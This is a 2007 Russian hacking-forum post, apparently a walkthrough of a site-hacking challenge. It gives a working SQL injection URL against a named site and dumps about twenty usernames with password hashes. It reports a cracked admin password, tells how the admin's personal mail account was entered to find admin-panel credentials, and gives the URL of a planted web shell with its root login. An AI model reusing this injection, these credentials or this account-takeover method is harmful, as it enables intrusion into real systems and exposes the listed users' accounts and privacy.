11.01.2007, 12:21
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
С помощьюскули получаем инфуиз БД
http://www.gfs-competition.net/index.php?act=news&id=-1/**/UNION/**/SELECT/**/1,name,pass,e_mail,5/**/from/**/users/**/LIMIT/**/1,1/*
FSadmin:a7551578824c35ccd3565fc3459456fb
Rash:ee24d27f87948cb213619ad4fddd6819
ravshan22:ee24d27f87948cb213619ad4fddd6819
alex05:e93821493d5341f2644919dff86049e8
daga:68880cf4a81608b3225ed8c79a935dae
fargus:ee24d27f87948cb213619ad4fddd6819
oleg:07840410f453190105cd3d00060afef4
Pfilipp:0d8020b23e0b7b208c227288036c125e
Dionir:5dbc4c6b18b210b6d0aa7427e7616b34
EDO:68880cf4a81608b3225ed8c79a935dae
Jurhen:ee24d27f87948cb213619ad4fddd6819
Sign:ee24d27f87948cb213619ad4fddd6819
StoRM:a2eec1f40c20a34342391785b1c8ca2b
kras:07840410f453190105cd3d00060afef4
MirAn:816119b15218af2db213db7be5441d38
Martin:68880cf4a81608b3225ed8c79a935dae
ventura:ca211094bc8c3244ce1baa821abc9aec
bob:816119b15218af2db213db7be5441d38
Sanek:ee24d27f87948cb213619ad4fddd6819
Админ: FSadmin
Брутим, получаем noway1
(спасибо брутеру mildworm =) )
Далее видим инфу по челу: email:fsadmin@mail.ru
Заходим на почту с помощью извесных нам данных
(СПАСИБО PSalm69 за идею с мэйлом !!!!!)
Пробезаем по всем мылам и в черновиках находим заветные
Пароль к админке: worker:beman
Идем в админку http://www.gfs-competition.net/admin/
и качаем архив, в итоге получаем код, который надо показать админам в доказательство прохождения 546460
Спасибо за внимание =)
P.S. забыл про приятнуюмалочь )
шелл
http://www.gfs-competition.net/admin/files/phpshell.php
root:unicorn
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
Последний раз редактировалось madnet; 11.01.2007 в 17:49..
|
|
|